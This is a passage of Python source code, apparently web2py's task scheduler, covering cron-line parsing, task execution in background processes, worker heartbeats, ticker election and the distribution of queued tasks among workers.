'COMPLETED' FAILED = 'FAILED' TIMEOUT = 'TIMEOUT' STOPPED = 'STOPPED' ACTIVE = 'ACTIVE' TERMINATE = 'TERMINATE' DISABLED = 'DISABLED' KILL = 'KILL' PICK = 'PICK' STOP_TASK = 'STOP_TASK' EXPIRED = 'EXPIRED' SECONDS = 1 HEARTBEAT = 3 * SECONDS MAXHIBERNATION = 10 CLEAROUT = '!clear!' 
CALLABLETYPES = (types.LambdaType, types.FunctionType, types.BuiltinFunctionType, types.MethodType, types.BuiltinMethodType) class Task(object): """Defines a "task" object that gets passed from the main thread to the executor's one """ def __init__(self, app, function, timeout, args='[]', vars='{}', **kwargs): logger.debug(' new task allocated: %s.%s', app, function) self.app = app self.function = function self.timeout = timeout self.args = args # json self.vars = vars # json self.__dict__.update(kwargs) def __str__(self): return '<Task: %s>' % self.function class TaskReport(object): """Defines a "task report" object that gets passed from the executor's thread to the main one """ def __init__(self, status, result=None, output=None, tb=None): logger.debug(' new task report: %s', status) if tb: logger.debug(' traceback: %s', tb) else: logger.debug(' result: %s', result) self.status = status self.result = result self.output = output self.tb = tb def __str__(self): return '<TaskReport: %s>' % self.status class JobGraph(object): """Experimental: dependencies amongs tasks.""" def __init__(self, db, job_name): self.job_name = job_name or 'job_0' self.db = db def add_deps(self, task_parent, task_child): """Create a dependency between task_parent and task_child.""" self.db.scheduler_task_deps.insert(task_parent=task_parent, task_child=task_child, job_name=self.job_name) def validate(self, job_name=None): """Validate if all tasks job_name can be completed. Checks if there are no mutual dependencies among tasks. Commits at the end if successfull, or it rollbacks the entire transaction. Handle with care! """ db = self.db sd = db.scheduler_task_deps if job_name: q = sd.job_name == job_name else: q = sd.id > 0 edges = db(q).select() nested_dict = {} for row in edges: k = row.task_parent if k in nested_dict: nested_dict[k].add(row.task_child) else: nested_dict[k] = set((row.task_child,)) try: rtn = [] for k, v in nested_dict.items(): v.discard(k) # Ignore self dependencies extra_items_in_deps = reduce(set.union, nested_dict.values()) - set(nested_dict.keys()) nested_dict.update(dict((item, set()) for item in extra_items_in_deps)) while True: ordered = set(item for item, dep in nested_dict.items() if not dep) if not ordered: break rtn.append(ordered) nested_dict = dict( (item, (dep - ordered)) for item, dep in nested_dict.items() if item not in ordered ) assert not nested_dict, "A cyclic dependency exists amongst %r" % nested_dict db.commit() return rtn except: db.rollback() return None class CronParser(object): def __init__(self, cronline, base=None): self.cronline = cronline self.sched = base or datetime.datetime.now() self.task = None @staticmethod def _rangetolist(s, period='min'): retval = [] if s.startswith('*'): if period == 'min': s = s.replace('*', '0-59', 1) elif period == 'hr': s = s.replace('*', '0-23', 1) elif period == 'dom': s = s.replace('*', '1-31', 1) elif period == 'mon': s = s.replace('*', '1-12', 1) elif period == 'dow': s = s.replace('*', '0-6', 1) m = re.compile(r'(\d+)-(\d+)/(\d+)') match = m.match(s) if match: min_, max_ = int(match.group(1)), int(match.group(2)) + 1 step_ = int(match.group(3)) else: m = re.compile(r'(\d+)/(\d+)') ranges_max = {'min': 59, 'hr': 23, 'mon': 12, 'dom': 31, 'dow': 7} match = m.match(s) if match: min_, max_ = int(match.group(1)), ranges_max[period] + 1 step_ = int(match.group(2)) if match: for i in range(min_, max_, step_): retval.append(i) return retval @staticmethod def _sanitycheck(values, period): if period == 'min': check = all(0 <= i <= 59 for i 
in values) elif period == 'hr': check = all(0 <= i <= 23 for i in values) elif period == 'dom': domrange = list(range(1, 32)) + ['l'] check = all(i in domrange for i in values) elif period == 'mon': check = all(1 <= i <= 12 for i in values) elif period == 'dow': check = all(0 <= i <= 7 for i in values) return check def _parse(self): line = self.cronline.lower() task = {} if line.startswith('@yearly'): line = line.replace('@yearly', '0 0 1 1 *') elif line.startswith('@annually'): line = line.replace('@annually', '0 0 1 1 *') elif line.startswith('@monthly'): line = line.replace('@monthly', '0 0 1 * *') elif line.startswith('@weekly'): line = line.replace('@weekly', '0 0 * * 0') elif line.startswith('@daily'): line = line.replace('@daily', '0 0 * * *') elif line.startswith('@midnight'): line = line.replace('@midnight', '0 0 * * *') elif line.startswith('@hourly'): line = line.replace('@hourly', '0 * * * *') params = line.strip().split() if len(params) < 5: raise ValueError('Invalid cron line (too short)') elif len(params) > 5: raise ValueError('Invalid cron line (too long)') daysofweek = {'sun': 0, 'mon': 1, 'tue': 2, 'wed': 3, 'thu': 4, 'fri': 5, 'sat': 6} monthsofyear = {'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5, 'jun': 6, 'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10, 'nov': 11, 'dec': 12, 'l': 'l'} for (s, i) in zip(params[:5], ['min', 'hr', 'dom', 'mon', 'dow']): if s not in [None, '*']: task[i] = [] vals = s.split(',') for val in vals: if i == 'dow': refdict = daysofweek elif i == 'mon': refdict = monthsofyear if i in ('dow', 'mon') and '-' in val and '/' not in val: isnum = val.split('-')[0].isdigit() if isnum: val = '%s/1' % val else: val = '-'.join([str(refdict[v]) for v in val.split('-')]) if val != '-1' and '-' in val and '/' not in val: val = '%s/1' % val if '/' in val: task[i] += self._rangetolist(val, i) elif val.isdigit() or val == '-1': task[i].append(int(val)) elif i in ('dow', 'mon'): if val in refdict: task[i].append(refdict[val]) elif i == 'dom' and val == 'l': task[i].append(val) if not task[i]: raise ValueError('Invalid cron value (%s)' % s) if not self._sanitycheck(task[i], i): raise ValueError('Invalid cron value (%s)' % s) task[i] = sorted(task[i]) self.task = task @staticmethod def _get_next_dow(sched, task): task_dow = [a % 7 for a in task['dow']] while sched.isoweekday() % 7 not in task_dow: sched += datetime.timedelta(days=1) return sched @staticmethod def _get_next_dom(sched, task): if task['dom'] == ['l']: last_feb = 29 if sched.year % 4 == 0 else 28 lastdayofmonth = [ 31, last_feb, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 ] task_dom = [lastdayofmonth[sched.month - 1]] else: task_dom = task['dom'] while sched.day not in task_dom: sched += datetime.timedelta(days=1) return sched @staticmethod def _get_next_mon(sched, task): while sched.month not in task['mon']: if sched.month < 12: sched = sched.replace(month=sched.month + 1) else: sched = sched.replace(month=1, year=sched.year + 1) return sched @staticmethod def _getnext_hhmm(sched, task, add_to=True): if add_to: sched += datetime.timedelta(minutes=1) if 'min' in task: while sched.minute not in task['min']: sched += datetime.timedelta(minutes=1) if 'hr' in task and sched.hour not in task['hr']: while sched.hour not in task['hr']: sched += datetime.timedelta(hours=1) return sched def _getnext_date(self, sched, task): if 'dow' in task and 'dom' in task: dow = self._get_next_dow(sched, task) dom = self._get_next_dom(sched, task) sched = min(dow, dom) elif 'dow' in task: sched = self._get_next_dow(sched, task) elif 
'dom' in task: sched = self._get_next_dom(sched, task) if 'mon' in task: sched = self._get_next_mon(sched, task) return sched.replace(hour=0, minute=0) def get_next(self): """Get next date according to specs.""" if not self.task: self._parse() task = self.task sched = self.sched x = 0 while x < 1000: # avoid potential max recursions x += 1 try: next_date = self._getnext_date(sched, task) except (ValueError, OverflowError) as e: raise ValueError('Invalid cron expression (%s)' % e) if next_date.date() > self.sched.date(): # we rolled date, check for valid hhmm sched = self._getnext_hhmm(next_date, task, False) break else: # same date, get next hhmm sched_time = self._getnext_hhmm(sched, task, True) if sched_time.date() > sched.date(): # we rolled date again :( sched = sched_time else: sched = sched_time break else: raise ValueError('Potential bug found, please submit your ' 'cron expression to the authors') self.sched = sched return sched def __iter__(self): """Support iteration.""" return self __next__ = next = get_next # the two functions below deal with simplejson decoding as unicode, esp for the dict decode # and subsequent usage as function Keyword arguments unicode variable names won't work! # borrowed from http://stackoverflow.com/questions/956867/ def _decode_list(lst): if not PY2: return lst newlist = [] for i in lst: if isinstance(i, unicode): i = i.encode('utf-8') elif isinstance(i, list): i = _decode_list(i) newlist.append(i) return newlist def _decode_dict(dct): if not PY2: return dct newdict = {} for k, v in iteritems(dct): if isinstance(k, unicode): k = k.encode('utf-8') if isinstance(v, unicode): v = v.encode('utf-8') elif isinstance(v, list): v = _decode_list(v) newdict[k] = v return newdict def executor(queue, task, out): """The function used to execute tasks in the background process.""" logger.debug(' task started') class LogOutput(object): """Facility to log output at intervals.""" def __init__(self, out_queue): self.out_queue = out_queue self.stdout = sys.stdout sys.stdout = self def __del__(self): sys.stdout = self.stdout def flush(self): pass def write(self, data): self.out_queue.put(data) W2P_TASK = Storage({ 'id': task.task_id, 'uuid': task.uuid, 'run_id': task.run_id }) stdout = LogOutput(out) try: if task.app: os.chdir(os.environ['WEB2PY_PATH']) from gluon.shell import env, parse_path_info from gluon import current level = logging.getLogger().getEffectiveLevel() logging.getLogger().setLevel(logging.WARN) # Get controller-specific subdirectory if task.app is of # form 'app/controller' (a, c, f) = parse_path_info(task.app) _env = env(a=a, c=c, import_models=True, extra_request={'is_scheduler': True}) logging.getLogger().setLevel(level) f = task.function functions = current._scheduler.tasks if not functions: # look into env _function = _env.get(f) else: _function = functions.get(f) if not isinstance(_function, CALLABLETYPES): raise NameError( "name '%s' not found in scheduler's environment" % f) # Inject W2P_TASK into environment _env.update({'W2P_TASK': W2P_TASK}) # Inject W2P_TASK into current from gluon import current current.W2P_TASK = W2P_TASK globals().update(_env) args = _decode_list(loads(task.args)) vars = loads(task.vars, object_hook=_decode_dict) result = dumps(_function(*args, **vars)) else: # for testing purpose only result = eval(task.function)( *loads(task.args, object_hook=_decode_dict), **loads(task.vars, object_hook=_decode_dict)) if len(result) >= 1024: fd, temp_path = tempfile.mkstemp(suffix='.w2p_sched') with os.fdopen(fd, 'w') as f: 
f.write(result) result = 'w2p_special:%s' % temp_path queue.put(TaskReport('COMPLETED', result=result)) except BaseException as e: tb = traceback.format_exc() queue.put(TaskReport('FAILED', tb=tb)) del stdout class MetaScheduler(threading.Thread): """Base class documenting scheduler's base methods.""" def __init__(self): threading.Thread.__init__(self) self.process = None # the background process self.have_heartbeat = True # set to False to kill self.empty_runs = 0 def async(self, task): """Start the background process. Args: task : a `Task` object Returns: tuple: containing:: ('ok',result,output) ('error',exception,None) ('timeout',None,None) ('terminated',None,None) """ db = self.db sr = db.scheduler_run out = multiprocessing.Queue() queue = multiprocessing.Queue(maxsize=1) p = multiprocessing.Process(target=executor, args=(queue, task, out)) self.process = p logger.debug(' task starting') p.start() task_output = "" tout = "" try: if task.sync_output > 0: run_timeout = task.sync_output else: run_timeout = task.timeout start = time.time() while p.is_alive() and (not task.timeout or time.time() - start < task.timeout): if tout: try: logger.debug(' partial output saved') db(sr.id == task.run_id).update(run_output=task_output) db.commit() except: pass p.join(timeout=run_timeout) tout = "" while not out.empty(): tout += out.get() if tout: logger.debug(' partial output: "%s"', str(tout)) if CLEAROUT in tout: task_output = tout[ tout.rfind(CLEAROUT) + len(CLEAROUT):] else: task_output += tout except: p.terminate() p.join() logger.debug(' task stopped by general exception') tr = TaskReport(STOPPED) else: if p.is_alive(): p.terminate() logger.debug(' task timeout') try: # we try to get a traceback here tr = queue.get(timeout=2) tr.status = TIMEOUT tr.output = task_output except Queue.Empty: tr = TaskReport(TIMEOUT) elif queue.empty(): logger.debug(' task stopped') tr = TaskReport(STOPPED) else: logger.debug(' task completed or failed') tr = queue.get() result = tr.result if result and result.startswith('w2p_special'): temp_path = result.replace('w2p_special:', '', 1) with open(temp_path) as f: tr.result = f.read() os.unlink(temp_path) tr.output = task_output return tr def die(self): """Forces termination of the worker process along with any running task""" logger.info('die!') self.have_heartbeat = False self.terminate_process() def give_up(self): """Waits for any running task to be executed, then exits the worker process""" logger.info('Giving up as soon as possible!') self.have_heartbeat = False def terminate_process(self): """Terminate any running tasks (internal use only)""" try: self.process.terminate() except: pass # no process to terminate def run(self): """This is executed by the main thread to send heartbeats""" counter = 0 while self.have_heartbeat: self.send_heartbeat(counter) counter += 1 def start_heartbeats(self): self.start() def send_heartbeat(self, counter): raise NotImplementedError def pop_task(self): """Fetches a task ready to be executed""" raise NotImplementedError def report_task(self, task, task_report): """Creates a task report""" raise NotImplementedError def sleep(self): raise NotImplementedError def loop(self): """Main loop, fetching tasks and starting executor's background processes""" raise NotImplementedError TASK_STATUS = (QUEUED, RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED, EXPIRED) RUN_STATUS = (RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED) WORKER_STATUS = (ACTIVE, PICK, DISABLED, TERMINATE, KILL, STOP_TASK) class IS_CRONLINE(object): """ Validates cronline """ 
def __init__(self, error_message=None): self.error_message = error_message def __call__(self, value): recur = CronParser(value, datetime.datetime.now()) try: recur.get_next() return (value, None) except (KeyError, ValueError) as e: if not self.error_message: return (value, e) return (value, self.error_message) class TYPE(object): """ Validator that checks whether field is valid json and validates its type. Used for `args` and `vars` of the scheduler_task table """ def __init__(self, myclass=list, parse=False): self.myclass = myclass self.parse = parse def __call__(self, value): from gluon import current try: obj = loads(value) except: return (value, current.T('invalid json')) else: if isinstance(obj, self.myclass): if self.parse: return (obj, None) else: return (value, None) else: return (value, current.T('Not of type: %s') % self.myclass) class Scheduler(MetaScheduler): """Scheduler object Args: db: DAL connection where Scheduler will create its tables tasks(dict): either a dict containing name-->func or None. If None, functions will be searched in the environment migrate(bool): turn migration on/off for the Scheduler's tables worker_name(str): force worker_name to identify each process. Leave it to None to autoassign a name (hostname#pid) group_names(list): process tasks belonging to this group defaults to ['main'] if nothing gets passed heartbeat(int): how many seconds the worker sleeps between one execution and the following one. Indirectly sets how many seconds will pass between checks for new tasks max_empty_runs(int): how many loops are allowed to pass without processing any tasks before exiting the process. 0 to keep always the process alive discard_results(bool): Scheduler stores executions's details into the scheduler_run table. By default, only if there is a result the details are kept. Turning this to True means discarding results even for tasks that return something utc_time(bool): do all datetime calculations assuming UTC as the timezone. 
Remember to pass `start_time` and `stop_time` to tasks accordingly """ def __init__(self, db, tasks=None, migrate=True, worker_name=None, group_names=None, heartbeat=HEARTBEAT, max_empty_runs=0, discard_results=False, utc_time=False): MetaScheduler.__init__(self) self.db = db self.db_thread = None self.tasks = tasks self.group_names = group_names or ['main'] self.heartbeat = heartbeat self.worker_name = worker_name or IDENTIFIER self.max_empty_runs = max_empty_runs self.discard_results = discard_results self.is_a_ticker = False self.do_assign_tasks = False self.greedy = False self.utc_time = utc_time self.w_stats = Storage( dict( status=RUNNING, sleep=heartbeat, total=0, errors=0, empty_runs=0, queue=0, distribution=None, workers=0) ) # dict holding statistics from gluon import current current._scheduler = self self.define_tables(db, migrate=migrate) def __get_migrate(self, tablename, migrate=True): if migrate is False: return False elif migrate is True: return True elif isinstance(migrate, str): return "%s%s.table" % (migrate, tablename) return True def now(self): """Shortcut that fetches current time based on UTC preferences.""" return self.utc_time and datetime.datetime.utcnow() or datetime.datetime.now() def set_requirements(self, scheduler_task): """Called to set defaults for lazy_tables connections.""" from gluon import current if hasattr(current, 'request'): scheduler_task.application_name.default = '%s/%s' % ( current.request.application, current.request.controller ) def define_tables(self, db, migrate): """Define Scheduler tables structure.""" from pydal.base import DEFAULT logger.debug('defining tables (migrate=%s)', migrate) now = self.now db.define_table( 'scheduler_task', Field('application_name', requires=IS_NOT_EMPTY(), default=None, writable=False), Field('task_name', default=None), Field('group_name', default='main'), Field('status', requires=IS_IN_SET(TASK_STATUS), default=QUEUED, writable=False), Field('function_name', requires=IS_IN_SET(sorted(self.tasks.keys())) if self.tasks else DEFAULT), Field('uuid', length=255, requires=IS_NOT_IN_DB(db, 'scheduler_task.uuid'), unique=True, default=web2py_uuid), Field('args', 'text', default='[]', requires=TYPE(list)), Field('vars', 'text', default='{}', requires=TYPE(dict)), Field('enabled', 'boolean', default=True), Field('start_time', 'datetime', default=now, requires=IS_DATETIME()), Field('next_run_time', 'datetime', default=now), Field('stop_time', 'datetime'), Field('repeats', 'integer', default=1, comment="0=unlimited", requires=IS_INT_IN_RANGE(0, None)), Field('retry_failed', 'integer', default=0, comment="-1=unlimited", requires=IS_INT_IN_RANGE(-1, None)), Field('period', 'integer', default=60, comment='seconds', requires=IS_INT_IN_RANGE(0, None)), Field('prevent_drift', 'boolean', default=False, comment='Exact start_times between runs'), Field('cronline', default=None, comment='Discard "period", use this cron expr instead', requires=IS_EMPTY_OR(IS_CRONLINE())), Field('timeout', 'integer', default=60, comment='seconds', requires=IS_INT_IN_RANGE(1, None)), Field('sync_output', 'integer', default=0, comment="update output every n sec: 0=never", requires=IS_INT_IN_RANGE(0, None)), Field('times_run', 'integer', default=0, writable=False), Field('times_failed', 'integer', default=0, writable=False), Field('last_run_time', 'datetime', writable=False, readable=False), Field('assigned_worker_name', default='', writable=False), on_define=self.set_requirements, migrate=self.__get_migrate('scheduler_task', migrate), format='(%(id)s) 
%(task_name)s') db.define_table( 'scheduler_run', Field('task_id', 'reference scheduler_task'), Field('status', requires=IS_IN_SET(RUN_STATUS)), Field('start_time', 'datetime'), Field('stop_time', 'datetime'), Field('run_output', 'text'), Field('run_result', 'text'), Field('traceback', 'text'), Field('worker_name', default=self.worker_name), migrate=self.__get_migrate('scheduler_run', migrate) ) db.define_table( 'scheduler_worker', Field('worker_name', length=255, unique=True), Field('first_heartbeat', 'datetime'), Field('last_heartbeat', 'datetime'), Field('status', requires=IS_IN_SET(WORKER_STATUS)), Field('is_ticker', 'boolean', default=False, writable=False), Field('group_names', 'list:string', default=self.group_names), Field('worker_stats', 'json'), migrate=self.__get_migrate('scheduler_worker', migrate) ) db.define_table( 'scheduler_task_deps', Field('job_name', default='job_0'), Field('task_parent', 'integer', requires=IS_IN_DB(db, 'scheduler_task.id', '%(task_name)s') ), Field('task_child', 'reference scheduler_task'), Field('can_visit', 'boolean', default=False), migrate=self.__get_migrate('scheduler_task_deps', migrate) ) if migrate is not False: db.commit() def loop(self, worker_name=None): """Main loop. This works basically as a neverending loop that: - checks if the worker is ready to process tasks (is not DISABLED) - pops a task from the queue - if there is a task: - spawns the executor background process - waits for the process to be finished - sleeps `heartbeat` seconds - if there is not a task: - checks for max_empty_runs - sleeps `heartbeat` seconds """ signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1)) try: self.start_heartbeats() while self.have_heartbeat: if self.w_stats.status == DISABLED: logger.debug('Someone stopped me, sleeping until better' ' times come (%s)', self.w_stats.sleep) self.sleep() continue logger.debug('looping...') task = self.wrapped_pop_task() if task: self.w_stats.empty_runs = 0 self.w_stats.status = RUNNING self.w_stats.total += 1 self.wrapped_report_task(task, self.async(task)) if not self.w_stats.status == DISABLED: self.w_stats.status = ACTIVE else: self.w_stats.empty_runs += 1 logger.debug('sleeping...') if self.max_empty_runs != 0: logger.debug('empty runs %s/%s', self.w_stats.empty_runs, self.max_empty_runs) if self.w_stats.empty_runs >= self.max_empty_runs: logger.info( 'empty runs limit reached, killing myself') self.die() self.sleep() except (KeyboardInterrupt, SystemExit): logger.info('catched') self.die() def wrapped_assign_tasks(self, db): """Commodity function to call `assign_tasks` and trap exceptions. If an exception is raised, assume it happened because of database contention and retries `assign_task` after 0.5 seconds """ logger.debug('Assigning tasks...') db.commit() # db.commit() only for Mysql x = 0 while x < 10: try: self.assign_tasks(db) db.commit() logger.debug('Tasks assigned...') break except: self.w_stats.errors += 1 db.rollback() logger.error('TICKER: error assigning tasks (%s)', x) x += 1 time.sleep(0.5) def wrapped_pop_task(self): """Commodity function to call `pop_task` and trap exceptions. 
If an exception is raised, assume it happened because of database contention and retries `pop_task` after 0.5 seconds """ db = self.db db.commit() # another nifty db.commit() only for Mysql x = 0 while x < 10: try: rtn = self.pop_task(db) return rtn break except: self.w_stats.errors += 1 db.rollback() logger.error(' error popping tasks') x += 1 time.sleep(0.5) def pop_task(self, db): """Grab a task ready to be executed from the queue.""" now = self.now() st = self.db.scheduler_task if self.is_a_ticker and self.do_assign_tasks: # I'm a ticker, and 5 loops passed without reassigning tasks, # let's do that and loop again self.wrapped_assign_tasks(db) return None # ready to process something grabbed = db( (st.assigned_worker_name == self.worker_name) & (st.status == ASSIGNED) ) task = grabbed.select(limitby=(0, 1), orderby=st.next_run_time).first() if task: task.update_record(status=RUNNING, last_run_time=now) # noone will touch my task! db.commit() logger.debug(' work to do %s', task.id) else: if self.is_a_ticker and self.greedy: # there are other tasks ready to be assigned logger.info('TICKER: greedy loop') self.wrapped_assign_tasks(db) else: logger.info('nothing to do') return None times_run = task.times_run + 1 if task.cronline: cron_recur = CronParser(task.cronline, now.replace(second=0)) next_run_time = cron_recur.get_next() elif not task.prevent_drift: next_run_time = task.last_run_time + datetime.timedelta( seconds=task.period ) else: # calc next_run_time based on available slots # see #1191 next_run_time = task.start_time secondspassed = (now - next_run_time).total_seconds() steps = secondspassed // task.period + 1 next_run_time += datetime.timedelta(seconds=task.period * steps) if times_run < task.repeats or task.repeats == 0: # need to run (repeating task) run_again = True else: # no need to run again run_again = False run_id = 0 while True and not self.discard_results: logger.debug(' new scheduler_run record') try: run_id = db.scheduler_run.insert( task_id=task.id, status=RUNNING, start_time=now, worker_name=self.worker_name) db.commit() break except: time.sleep(0.5) db.rollback() logger.info('new task %(id)s "%(task_name)s"' ' %(application_name)s.%(function_name)s' % task) return Task( app=task.application_name, function=task.function_name, timeout=task.timeout, args=task.args, # in json vars=task.vars, # in json task_id=task.id, run_id=run_id, run_again=run_again, next_run_time=next_run_time, times_run=times_run, stop_time=task.stop_time, retry_failed=task.retry_failed, times_failed=task.times_failed, sync_output=task.sync_output, uuid=task.uuid) def wrapped_report_task(self, task, task_report): """Commodity function to call `report_task` and trap exceptions. If an exception is raised, assume it happened because of database contention and retries `pop_task` after 0.5 seconds """ db = self.db while True: try: self.report_task(task, task_report) db.commit() break except: self.w_stats.errors += 1 db.rollback() logger.error(' error storing result') time.sleep(0.5) def report_task(self, task, task_report): """Take care of storing the result according to preferences. Deals with logic for repeating tasks. 
""" db = self.db now = self.now() st = db.scheduler_task sr = db.scheduler_run if not self.discard_results: if task_report.result != 'null' or task_report.tb: # result is 'null' as a string if task completed # if it's stopped it's None as NoneType, so we record # the STOPPED "run" anyway logger.debug(' recording task report in db (%s)', task_report.status) db(sr.id == task.run_id).update( status=task_report.status, stop_time=now, run_result=task_report.result, run_output=task_report.output, traceback=task_report.tb) else: logger.debug(' deleting task report in db because of no result') db(sr.id == task.run_id).delete() # if there is a stop_time and the following run would exceed it is_expired = (task.stop_time and task.next_run_time > task.stop_time and True or False) status = (task.run_again and is_expired and EXPIRED or task.run_again and not is_expired and QUEUED or COMPLETED) if task_report.status == COMPLETED: d = dict(status=status, next_run_time=task.next_run_time, times_run=task.times_run, times_failed=0 ) db(st.id == task.task_id).update(**d) if status == COMPLETED: self.update_dependencies(db, task.task_id) else: st_mapping = {'FAILED': 'FAILED', 'TIMEOUT': 'TIMEOUT', 'STOPPED': 'FAILED'}[task_report.status] status = (task.retry_failed and task.times_failed < task.retry_failed and QUEUED or task.retry_failed == -1 and QUEUED or st_mapping) db(st.id == task.task_id).update( times_failed=st.times_failed + 1, next_run_time=task.next_run_time, status=status ) logger.info('task completed (%s)', task_report.status) def update_dependencies(self, db, task_id): """Unblock execution paths for Jobs.""" db(db.scheduler_task_deps.task_child == task_id).update(can_visit=True) def adj_hibernation(self): """Used to increase the "sleep" interval for DISABLED workers.""" if self.w_stats.status == DISABLED: wk_st = self.w_stats.sleep hibernation = wk_st + HEARTBEAT if wk_st < MAXHIBERNATION else MAXHIBERNATION self.w_stats.sleep = hibernation def send_heartbeat(self, counter): """Coordination among available workers. 
It: - sends the heartbeat - elects a ticker among available workers (the only process that effectively dispatch tasks to workers) - deals with worker's statuses - does "housecleaning" for dead workers - triggers tasks assignment to workers """ if not self.db_thread: logger.debug('thread building own DAL object') self.db_thread = DAL( self.db._uri, folder=self.db._adapter.folder) self.define_tables(self.db_thread, migrate=False) try: db = self.db_thread sw, st = db.scheduler_worker, db.scheduler_task now = self.now() # record heartbeat mybackedstatus = db(sw.worker_name == self.worker_name).select().first() if not mybackedstatus: sw.insert(status=ACTIVE, worker_name=self.worker_name, first_heartbeat=now, last_heartbeat=now, group_names=self.group_names, worker_stats=self.w_stats) self.w_stats.status = ACTIVE self.w_stats.sleep = self.heartbeat mybackedstatus = ACTIVE else: mybackedstatus = mybackedstatus.status if mybackedstatus == DISABLED: # keep sleeping self.w_stats.status = DISABLED logger.debug('........recording heartbeat (%s)', self.w_stats.status) db(sw.worker_name == self.worker_name).update( last_heartbeat=now, worker_stats=self.w_stats) elif mybackedstatus == TERMINATE: self.w_stats.status = TERMINATE logger.debug("Waiting to terminate the current task") self.give_up() elif mybackedstatus == KILL: self.w_stats.status = KILL self.die() return else: if mybackedstatus == STOP_TASK: logger.info('Asked to kill the current task') self.terminate_process() logger.debug('........recording heartbeat (%s)', self.w_stats.status) db(sw.worker_name == self.worker_name).update( last_heartbeat=now, status=ACTIVE, worker_stats=self.w_stats) self.w_stats.sleep = self.heartbeat # re-activating the process if self.w_stats.status != RUNNING: self.w_stats.status = ACTIVE self.do_assign_tasks = False if counter % 5 == 0 or mybackedstatus == PICK: try: # delete dead workers expiration = now - datetime.timedelta( seconds=self.heartbeat * 3) departure = now - datetime.timedelta( seconds=self.heartbeat * 3 * 15) logger.debug( ' freeing workers that have not sent heartbeat') dead_workers = db( ((sw.last_heartbeat < expiration) & (sw.status == ACTIVE)) | ((sw.last_heartbeat < departure) & (sw.status != ACTIVE)) ) dead_workers_name = dead_workers._select(sw.worker_name) db( (st.assigned_worker_name.belongs(dead_workers_name)) & (st.status == RUNNING) ).update(assigned_worker_name='', status=QUEUED) dead_workers.delete() try: self.is_a_ticker = self.being_a_ticker() except: logger.error('Error coordinating TICKER') if self.w_stats.status == ACTIVE: self.do_assign_tasks = True except: logger.error('Error cleaning up') db.commit() except: logger.error('Error retrieving status') db.rollback() self.adj_hibernation() self.sleep() def being_a_ticker(self): """Elect a TICKER process that assigns tasks to available workers. 
Does its best to elect a worker that is not busy processing other tasks to allow a proper distribution of tasks among all active workers ASAP """ db = self.db_thread sw = db.scheduler_worker my_name = self.worker_name all_active = db( (sw.worker_name != my_name) & (sw.status == ACTIVE) ).select(sw.is_ticker, sw.worker_name) ticker = all_active.find(lambda row: row.is_ticker is True).first() not_busy = self.w_stats.status == ACTIVE if not ticker: # if no other tickers are around if not_busy: # only if I'm not busy db(sw.worker_name == my_name).update(is_ticker=True) db(sw.worker_name != my_name).update(is_ticker=False) logger.info("TICKER: I'm a ticker") else: # I'm busy if len(all_active) >= 1: # so I'll "downgrade" myself to a "poor worker" db(sw.worker_name == my_name).update(is_ticker=False) else: not_busy = True db.commit() return not_busy else: logger.info( "%s is a ticker, I'm a poor worker" % ticker.worker_name) return False def assign_tasks(self, db): """Assign task to workers, that can then pop them from the queue. Deals with group_name(s) logic, in order to assign linearly tasks to available workers for those groups """ sw, st, sd = db.scheduler_worker, db.scheduler_task, db.scheduler_task_deps now = self.now() all_workers = db(sw.status == ACTIVE).select() # build workers as dict of groups wkgroups = {} for w in all_workers: if w.worker_stats['status'] == 'RUNNING': continue group_names = w.group_names for gname in group_names: if gname not in wkgroups: wkgroups[gname] = dict( workers=[{'name': w.worker_name, 'c': 0}]) else: wkgroups[gname]['workers'].append( {'name': w.worker_name, 'c': 0}) # set queued tasks that expired between "runs" (i.e., you turned off # the scheduler): then it wasn't expired, but now it is db( (st.status.belongs((QUEUED, ASSIGNED))) & (st.stop_time < now) ).update(status=EXPIRED) # calculate dependencies deps_with_no_deps = db( (sd.can_visit == False) & (~sd.task_child.belongs( db(sd.can_visit == False)._select(sd.task_parent) ) ) )._select(sd.task_child) no_deps = db( (st.status.belongs((QUEUED, ASSIGNED))) & ( (sd.id == None) | (st.id.belongs(deps_with_no_deps)) ) )._select(st.id, distinct=True, left=sd.on( (st.id == sd.task_parent) & (sd.can_visit == False) ) ) all_available = db( (st.status.belongs((QUEUED, ASSIGNED))) & (st.next_run_time <= now) & (st.enabled == True) & (st.id.belongs(no_deps)) ) limit = len(all_workers) * (50 / (len(wkgroups) or 1)) # if there are a moltitude of tasks, let's figure out a maximum of # tasks per worker. This can be further tuned with some added # intelligence (like esteeming how many tasks will a worker complete # before the ticker reassign them around, but the gain is quite small # 50 is a sweet spot also for fast tasks, with sane heartbeat values # NB: ticker reassign tasks every 5 cycles, so if a worker completes # its 50 tasks in less than heartbeat*5 seconds, # it won't pick new tasks until heartbeat*5 seconds pass. 
# If a worker is currently elaborating a long task, its tasks needs to # be reassigned to other workers # this shuffles up things a bit, in order to give a task equal chances # to be executed # let's freeze it up db.commit() x = 0 for group in wkgroups.keys(): tasks = all_available(st.group_name == group).select( limitby=(0, limit), orderby=st.next_run_time) # let's break up the queue evenly among workers for task in tasks: x += 1 gname = task.group_name ws = wkgroups.get(gname) if ws: counter = 0 myw = 0 for i, w in enumerate(ws['workers']): if w['c'] < counter: myw = i counter = w['c'] assigned_wn = wkgroups[gname]['workers'][myw]['name'] d = dict( status=ASSIGNED, assigned_worker_name=assigned_wn ) db( (st.id == task.id) & (st.status.belongs((QUEUED, ASSIGNED))) ).update(**d) wkgroups[gname]['workers'][myw]['c'] += 1 db.commit() # I didn't report tasks but I'm working nonetheless!!!! if x > 0: self.w_stats.empty_runs = 0 self.w_stats.queue = x self.w_stats.distribution = wkgroups self.w_stats.workers = len(all_workers) # I'll be greedy only if tasks assigned are equal to the limit # (meaning there could be others ready to be assigned) self.greedy = x >= limit logger.info('TICKER: workers are %s', len(all_workers)) logger.info('TICKER: tasks are %s', x) def sleep(self): """Calculate the number of seconds to sleep.""" time.sleep(self.w_stats.sleep) # should only sleep until next available task def set_worker_status(self, group_names=None, action=ACTIVE, exclude=None, limit=None, worker_name=None): """Internal function to set worker's status.""" ws = self.db.scheduler_worker if not group_names: group_names = self.group_names elif isinstance(group_names, str): group_names = [group_names] if worker_name: self.db(ws.worker_name == worker_name).update(status=action) return exclusion = exclude and exclude.append(action) or [action] if not limit: for group in group_names: self.db( (ws.group_names.contains(group)) & 